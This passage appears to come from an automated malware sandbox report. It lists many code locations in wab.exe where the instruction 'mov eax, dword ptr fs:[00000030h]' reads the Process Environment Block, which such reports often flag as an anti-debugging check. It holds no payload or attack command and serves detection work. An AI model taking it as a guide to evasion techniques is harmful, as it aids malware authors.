          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2139E5E7 mov eax, dword ptr fs:[00000030h]10_2_2139E5E7
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2139E5E7 mov eax, dword ptr fs:[00000030h]10_2_2139E5E7
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2139E5E7 mov eax, dword ptr fs:[00000030h]10_2_2139E5E7
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213765D0 mov eax, dword ptr fs:[00000030h]10_2_213765D0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213AA5D0 mov eax, dword ptr fs:[00000030h]10_2_213AA5D0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213AA5D0 mov eax, dword ptr fs:[00000030h]10_2_213AA5D0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213AE5CF mov eax, dword ptr fs:[00000030h]10_2_213AE5CF
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213AE5CF mov eax, dword ptr fs:[00000030h]10_2_213AE5CF
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213AA430 mov eax, dword ptr fs:[00000030h]10_2_213AA430
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2136C427 mov eax, dword ptr fs:[00000030h]10_2_2136C427
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2136E420 mov eax, dword ptr fs:[00000030h]10_2_2136E420
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2136E420 mov eax, dword ptr fs:[00000030h]10_2_2136E420
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2136E420 mov eax, dword ptr fs:[00000030h]10_2_2136E420
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213F6420 mov eax, dword ptr fs:[00000030h]10_2_213F6420
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213F6420 mov eax, dword ptr fs:[00000030h]10_2_213F6420
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213F6420 mov eax, dword ptr fs:[00000030h]10_2_213F6420
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213F6420 mov eax, dword ptr fs:[00000030h]10_2_213F6420
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213F6420 mov eax, dword ptr fs:[00000030h]10_2_213F6420
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213F6420 mov eax, dword ptr fs:[00000030h]10_2_213F6420
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213F6420 mov eax, dword ptr fs:[00000030h]10_2_213F6420
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213A8402 mov eax, dword ptr fs:[00000030h]10_2_213A8402
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213A8402 mov eax, dword ptr fs:[00000030h]10_2_213A8402
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213A8402 mov eax, dword ptr fs:[00000030h]10_2_213A8402
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2139A470 mov eax, dword ptr fs:[00000030h]10_2_2139A470
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2139A470 mov eax, dword ptr fs:[00000030h]10_2_2139A470
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2139A470 mov eax, dword ptr fs:[00000030h]10_2_2139A470
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213FC460 mov ecx, dword ptr fs:[00000030h]10_2_213FC460
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2139245A mov eax, dword ptr fs:[00000030h]10_2_2139245A
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213AE443 mov eax, dword ptr fs:[00000030h]10_2_213AE443
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213AE443 mov eax, dword ptr fs:[00000030h]10_2_213AE443
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213AE443 mov eax, dword ptr fs:[00000030h]10_2_213AE443
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213AE443 mov eax, dword ptr fs:[00000030h]10_2_213AE443
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213AE443 mov eax, dword ptr fs:[00000030h]10_2_213AE443
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213AE443 mov eax, dword ptr fs:[00000030h]10_2_213AE443
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213AE443 mov eax, dword ptr fs:[00000030h]10_2_213AE443
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213AE443 mov eax, dword ptr fs:[00000030h]10_2_213AE443
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213A44B0 mov ecx, dword ptr fs:[00000030h]10_2_213A44B0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213FA4B0 mov eax, dword ptr fs:[00000030h]10_2_213FA4B0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213764AB mov eax, dword ptr fs:[00000030h]10_2_213764AB
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213704E5 mov ecx, dword ptr fs:[00000030h]10_2_213704E5
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213A273C mov eax, dword ptr fs:[00000030h]10_2_213A273C
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213A273C mov ecx, dword ptr fs:[00000030h]10_2_213A273C
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213A273C mov eax, dword ptr fs:[00000030h]10_2_213A273C
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213EC730 mov eax, dword ptr fs:[00000030h]10_2_213EC730
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213AC720 mov eax, dword ptr fs:[00000030h]10_2_213AC720
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213AC720 mov eax, dword ptr fs:[00000030h]10_2_213AC720
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21370710 mov eax, dword ptr fs:[00000030h]10_2_21370710
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213A0710 mov eax, dword ptr fs:[00000030h]10_2_213A0710
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213AC700 mov eax, dword ptr fs:[00000030h]10_2_213AC700
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21378770 mov eax, dword ptr fs:[00000030h]10_2_21378770
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21380770 mov eax, dword ptr fs:[00000030h]10_2_21380770
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21380770 mov eax, dword ptr fs:[00000030h]10_2_21380770
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21380770 mov eax, dword ptr fs:[00000030h]10_2_21380770
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21380770 mov eax, dword ptr fs:[00000030h]10_2_21380770
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21380770 mov eax, dword ptr fs:[00000030h]10_2_21380770
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21380770 mov eax, dword ptr fs:[00000030h]10_2_21380770
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21380770 mov eax, dword ptr fs:[00000030h]10_2_21380770
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21380770 mov eax, dword ptr fs:[00000030h]10_2_21380770
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21380770 mov eax, dword ptr fs:[00000030h]10_2_21380770
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21380770 mov eax, dword ptr fs:[00000030h]10_2_21380770
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21380770 mov eax, dword ptr fs:[00000030h]10_2_21380770
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21380770 mov eax, dword ptr fs:[00000030h]10_2_21380770
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213FE75D mov eax, dword ptr fs:[00000030h]10_2_213FE75D
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21370750 mov eax, dword ptr fs:[00000030h]10_2_21370750
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213F4755 mov eax, dword ptr fs:[00000030h]10_2_213F4755
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213B2750 mov eax, dword ptr fs:[00000030h]10_2_213B2750
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213B2750 mov eax, dword ptr fs:[00000030h]10_2_213B2750
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213A674D mov esi, dword ptr fs:[00000030h]10_2_213A674D
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213A674D mov eax, dword ptr fs:[00000030h]10_2_213A674D
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213A674D mov eax, dword ptr fs:[00000030h]10_2_213A674D
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213707AF mov eax, dword ptr fs:[00000030h]10_2_213707AF
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213747FB mov eax, dword ptr fs:[00000030h]10_2_213747FB
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213747FB mov eax, dword ptr fs:[00000030h]10_2_213747FB
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2141678E mov eax, dword ptr fs:[00000030h]10_2_2141678E
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213927ED mov eax, dword ptr fs:[00000030h]10_2_213927ED
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213927ED mov eax, dword ptr fs:[00000030h]10_2_213927ED
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213927ED mov eax, dword ptr fs:[00000030h]10_2_213927ED
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213FE7E1 mov eax, dword ptr fs:[00000030h]10_2_213FE7E1
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2137C7C0 mov eax, dword ptr fs:[00000030h]10_2_2137C7C0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213F07C3 mov eax, dword ptr fs:[00000030h]10_2_213F07C3
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213A6620 mov eax, dword ptr fs:[00000030h]10_2_213A6620
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213A8620 mov eax, dword ptr fs:[00000030h]10_2_213A8620
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2137262C mov eax, dword ptr fs:[00000030h]10_2_2137262C
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2138E627 mov eax, dword ptr fs:[00000030h]10_2_2138E627
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213B2619 mov eax, dword ptr fs:[00000030h]10_2_213B2619
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2143866E mov eax, dword ptr fs:[00000030h]10_2_2143866E
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2143866E mov eax, dword ptr fs:[00000030h]10_2_2143866E
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2138260B mov eax, dword ptr fs:[00000030h]10_2_2138260B
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2138260B mov eax, dword ptr fs:[00000030h]10_2_2138260B
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2138260B mov eax, dword ptr fs:[00000030h]10_2_2138260B
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2138260B mov eax, dword ptr fs:[00000030h]10_2_2138260B
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2138260B mov eax, dword ptr fs:[00000030h]10_2_2138260B
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2138260B mov eax, dword ptr fs:[00000030h]10_2_2138260B
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2138260B mov eax, dword ptr fs:[00000030h]10_2_2138260B
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213EE609 mov eax, dword ptr fs:[00000030h]10_2_213EE609
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213A2674 mov eax, dword ptr fs:[00000030h]10_2_213A2674
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213AA660 mov eax, dword ptr fs:[00000030h]10_2_213AA660
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213AA660 mov eax, dword ptr fs:[00000030h]10_2_213AA660
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2138C640 mov eax, dword ptr fs:[00000030h]10_2_2138C640
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213A66B0 mov eax, dword ptr fs:[00000030h]10_2_213A66B0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213AC6A6 mov eax, dword ptr fs:[00000030h]10_2_213AC6A6
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21374690 mov eax, dword ptr fs:[00000030h]10_2_21374690
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21374690 mov eax, dword ptr fs:[00000030h]10_2_21374690
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213EE6F2 mov eax, dword ptr fs:[00000030h]10_2_213EE6F2
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213EE6F2 mov eax, dword ptr fs:[00000030h]10_2_213EE6F2
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213EE6F2 mov eax, dword ptr fs:[00000030h]10_2_213EE6F2
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213EE6F2 mov eax, dword ptr fs:[00000030h]10_2_213EE6F2
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213F06F1 mov eax, dword ptr fs:[00000030h]10_2_213F06F1
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213F06F1 mov eax, dword ptr fs:[00000030h]10_2_213F06F1
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213AA6C7 mov ebx, dword ptr fs:[00000030h]10_2_213AA6C7
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213AA6C7 mov eax, dword ptr fs:[00000030h]10_2_213AA6C7
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213F892A mov eax, dword ptr fs:[00000030h]10_2_213F892A
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213FC912 mov eax, dword ptr fs:[00000030h]10_2_213FC912
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21368918 mov eax, dword ptr fs:[00000030h]10_2_21368918
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21368918 mov eax, dword ptr fs:[00000030h]10_2_21368918
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213EE908 mov eax, dword ptr fs:[00000030h]10_2_213EE908
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213EE908 mov eax, dword ptr fs:[00000030h]10_2_213EE908
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21414978 mov eax, dword ptr fs:[00000030h]10_2_21414978
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21414978 mov eax, dword ptr fs:[00000030h]10_2_21414978
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213FC97C mov eax, dword ptr fs:[00000030h]10_2_213FC97C
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213B096E mov eax, dword ptr fs:[00000030h]10_2_213B096E
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213B096E mov edx, dword ptr fs:[00000030h]10_2_213B096E
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213B096E mov eax, dword ptr fs:[00000030h]10_2_213B096E
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21396962 mov eax, dword ptr fs:[00000030h]10_2_21396962
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21396962 mov eax, dword ptr fs:[00000030h]10_2_21396962
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21396962 mov eax, dword ptr fs:[00000030h]10_2_21396962
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2140892B mov eax, dword ptr fs:[00000030h]10_2_2140892B
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213F0946 mov eax, dword ptr fs:[00000030h]10_2_213F0946
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_214069C0 mov eax, dword ptr fs:[00000030h]10_2_214069C0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213F89B3 mov esi, dword ptr fs:[00000030h]10_2_213F89B3
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213F89B3 mov eax, dword ptr fs:[00000030h]10_2_213F89B3
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213F89B3 mov eax, dword ptr fs:[00000030h]10_2_213F89B3
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2143A9D3 mov eax, dword ptr fs:[00000030h]10_2_2143A9D3
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213829A0 mov eax, dword ptr fs:[00000030h]10_2_213829A0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213829A0 mov eax, dword ptr fs:[00000030h]10_2_213829A0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213829A0 mov eax, dword ptr fs:[00000030h]10_2_213829A0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213829A0 mov eax, dword ptr fs:[00000030h]10_2_213829A0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213829A0 mov eax, dword ptr fs:[00000030h]10_2_213829A0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213829A0 mov eax, dword ptr fs:[00000030h]10_2_213829A0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213829A0 mov eax, dword ptr fs:[00000030h]10_2_213829A0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213829A0 mov eax, dword ptr fs:[00000030h]10_2_213829A0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213829A0 mov eax, dword ptr fs:[00000030h]10_2_213829A0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213829A0 mov eax, dword ptr fs:[00000030h]10_2_213829A0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213829A0 mov eax, dword ptr fs:[00000030h]10_2_213829A0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213829A0 mov eax, dword ptr fs:[00000030h]10_2_213829A0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213829A0 mov eax, dword ptr fs:[00000030h]10_2_213829A0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213709AD mov eax, dword ptr fs:[00000030h]10_2_213709AD
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213709AD mov eax, dword ptr fs:[00000030h]10_2_213709AD
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213A29F9 mov eax, dword ptr fs:[00000030h]10_2_213A29F9
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213A29F9 mov eax, dword ptr fs:[00000030h]10_2_213A29F9
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213FE9E0 mov eax, dword ptr fs:[00000030h]10_2_213FE9E0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2137A9D0 mov eax, dword ptr fs:[00000030h]10_2_2137A9D0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2137A9D0 mov eax, dword ptr fs:[00000030h]10_2_2137A9D0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2137A9D0 mov eax, dword ptr fs:[00000030h]10_2_2137A9D0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2137A9D0 mov eax, dword ptr fs:[00000030h]10_2_2137A9D0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2137A9D0 mov eax, dword ptr fs:[00000030h]10_2_2137A9D0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2137A9D0 mov eax, dword ptr fs:[00000030h]10_2_2137A9D0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213A49D0 mov eax, dword ptr fs:[00000030h]10_2_213A49D0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213AA830 mov eax, dword ptr fs:[00000030h]10_2_213AA830
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21392835 mov eax, dword ptr fs:[00000030h]10_2_21392835
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21392835 mov eax, dword ptr fs:[00000030h]10_2_21392835
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21392835 mov eax, dword ptr fs:[00000030h]10_2_21392835
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21392835 mov ecx, dword ptr fs:[00000030h]10_2_21392835
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21392835 mov eax, dword ptr fs:[00000030h]10_2_21392835
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21392835 mov eax, dword ptr fs:[00000030h]10_2_21392835
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213FC810 mov eax, dword ptr fs:[00000030h]10_2_213FC810
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21406870 mov eax, dword ptr fs:[00000030h]10_2_21406870
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21406870 mov eax, dword ptr fs:[00000030h]10_2_21406870
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213FE872 mov eax, dword ptr fs:[00000030h]10_2_213FE872
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213FE872 mov eax, dword ptr fs:[00000030h]10_2_213FE872
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213A0854 mov eax, dword ptr fs:[00000030h]10_2_213A0854
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21374859 mov eax, dword ptr fs:[00000030h]10_2_21374859
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21374859 mov eax, dword ptr fs:[00000030h]10_2_21374859
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21382840 mov ecx, dword ptr fs:[00000030h]10_2_21382840
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2141483A mov eax, dword ptr fs:[00000030h]10_2_2141483A
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2141483A mov eax, dword ptr fs:[00000030h]10_2_2141483A
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213FC89D mov eax, dword ptr fs:[00000030h]10_2_213FC89D
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2143A8E4 mov eax, dword ptr fs:[00000030h]10_2_2143A8E4
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21370887 mov eax, dword ptr fs:[00000030h]10_2_21370887
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213AC8F9 mov eax, dword ptr fs:[00000030h]10_2_213AC8F9
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213AC8F9 mov eax, dword ptr fs:[00000030h]10_2_213AC8F9
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2139E8C0 mov eax, dword ptr fs:[00000030h]10_2_2139E8C0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21406B40 mov eax, dword ptr fs:[00000030h]10_2_21406B40
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21406B40 mov eax, dword ptr fs:[00000030h]10_2_21406B40
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2143AB40 mov eax, dword ptr fs:[00000030h]10_2_2143AB40
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21418B42 mov eax, dword ptr fs:[00000030h]10_2_21418B42
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2139EB20 mov eax, dword ptr fs:[00000030h]10_2_2139EB20
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2139EB20 mov eax, dword ptr fs:[00000030h]10_2_2139EB20
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213EEB1D mov eax, dword ptr fs:[00000030h]10_2_213EEB1D
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213EEB1D mov eax, dword ptr fs:[00000030h]10_2_213EEB1D
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213EEB1D mov eax, dword ptr fs:[00000030h]10_2_213EEB1D
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213EEB1D mov eax, dword ptr fs:[00000030h]10_2_213EEB1D
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213EEB1D mov eax, dword ptr fs:[00000030h]10_2_213EEB1D
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213EEB1D mov eax, dword ptr fs:[00000030h]10_2_213EEB1D
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213EEB1D mov eax, dword ptr fs:[00000030h]10_2_213EEB1D
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213EEB1D mov eax, dword ptr fs:[00000030h]10_2_213EEB1D
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213EEB1D mov eax, dword ptr fs:[00000030h]10_2_213EEB1D
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2136CB7E mov eax, dword ptr fs:[00000030h]10_2_2136CB7E
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21438B28 mov eax, dword ptr fs:[00000030h]10_2_21438B28
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21438B28 mov eax, dword ptr fs:[00000030h]10_2_21438B28
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21380BBE mov eax, dword ptr fs:[00000030h]10_2_21380BBE
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21380BBE mov eax, dword ptr fs:[00000030h]10_2_21380BBE
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2141EBD0 mov eax, dword ptr fs:[00000030h]10_2_2141EBD0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2139EBFC mov eax, dword ptr fs:[00000030h]10_2_2139EBFC
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21378BF0 mov eax, dword ptr fs:[00000030h]10_2_21378BF0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21378BF0 mov eax, dword ptr fs:[00000030h]10_2_21378BF0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21378BF0 mov eax, dword ptr fs:[00000030h]10_2_21378BF0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213FCBF0 mov eax, dword ptr fs:[00000030h]10_2_213FCBF0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21390BCB mov eax, dword ptr fs:[00000030h]10_2_21390BCB
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21390BCB mov eax, dword ptr fs:[00000030h]10_2_21390BCB
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21390BCB mov eax, dword ptr fs:[00000030h]10_2_21390BCB
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21370BCD mov eax, dword ptr fs:[00000030h]10_2_21370BCD
